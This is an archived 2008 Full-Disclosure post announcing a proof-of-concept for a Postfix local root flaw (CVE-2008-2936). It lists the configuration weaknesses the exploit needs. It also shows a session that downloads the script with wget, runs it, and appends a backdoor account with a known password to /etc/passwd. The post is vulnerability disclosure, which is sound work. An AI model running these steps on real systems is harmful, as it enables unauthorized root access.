full-disclosure-uk August 2008 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] PoCfix (PoC for Postfix lo

[Full-disclosure] PoCfix (PoC for Postfix local root vuln - CVE-2008-2936)

From: Roman Medina-Heigl Hernandez <roman_at_nospam>
Date: Sun Aug 31 2008 - 11:01:28 GMT
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk

Hash: SHA1


The recent vulnerability in Postfix discovered by Sebastian Krahmer is trivially exploitable when certain preconditions are met. Nevertheless, it's very difficult to find such conditions in a real-world scenario. I wrote this exploit for fun and to demonstrate that. I also hope it helps sysadmins to check and test their systems.

I used an Ubuntu/Debian (IA32) system which *I had to make vulnerable on purpose*. The tweaks were:
- - #1: make the spool writable to attacker
chmod o+w /var/mail
- - #2: disable mail aliases (LDA should be able to deliver mail directly to
"root" mailbox)
- - #3: use "local" postfix process as LDA

Perhaps condition #1 is the most difficult to meet, for a normal (non-privileged) user. But think about a privilege escalation if you manage to get into the "mail" group first (spool dir is tipically writable by members of "mail" group).

For #2, it depends on configuration, but Ubuntu/Debian usually creates an alias for "root", so that mail is delivered to a non-root account (and making the system non vulnerable to this exploit).

When installing Postfix, you are asked to choose a local delivery agent (LDA). I found one of my test systems using procmail (not vulnerable) and another one using postfix built-in LDA (vulnerable).

For a quick test, normally, it will be sufficient to append the following lines to /etc/postfix/main.cf:
alias_maps =
mailbox_command =
(left blank intentionally)

Finally, postfix should be refreshed:
postfix reload

There are other preconditions like:
- - #4: postfix should not be using maildir-style mailboxes

  • - #5: mailbox for "root" should not exist (or at least you should have permission to delete it, which is not always possible, even when #1 is true)

My script tries to do its best to check for these conditions (postfix config is very flexible, I only checked some typical parameters). Feel free to write me for corrections, etc.

roman_at_jupiter:~$ wget http://www.rs-labs.com/exploitsntools/rs_pocfix.sh roman@jupiter:~$ chmod a+x rs_pocfix.sh roman@jupiter:~$ ./rs_pocfix.sh # # "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936) # by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com> # # Tested: Ubuntu / Debian #
# [ Madrid, 30.Aug.2008 ]
# [*] Postfix seems to be installed [*] Hardlink to symlink not dereferenced [*] Spool dir is writable [*] Backed up: /etc/passwd (saved as "/tmp/pocfix_target_backup.18107") [*] Sending mail (3 seconds wait) [*] Exploit successful (appended data to /etc/passwd). Now "su dsr", pass is "dsrrocks")
roman@jupiter:~$ su dsr

PS: I didn't find Wietse's nice advisory [1] on postfix.org site (or at least, if it exists, it's not easy to find it). Although it seems that some non-POSIX issues in OS are contributing to the vulnerability, IMHO it's a (low-medium risk) vulnerability in Postfix and it deserves to be listed on postfix page. Despite this issue, Postfix continues being one of the best mail server software ever made and my favourite MTA.

[1] http://article.gmane.org/gmane.mail.postfix.announce/110

  • --

- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ] -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFIunoI5H+KferVZ0IRAkBrAKCwgHV+6O+At5Hw0dsYs8kYJZQjZACeJ96a Ww7gCuqOt32rA2HhiTuKeRk=

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/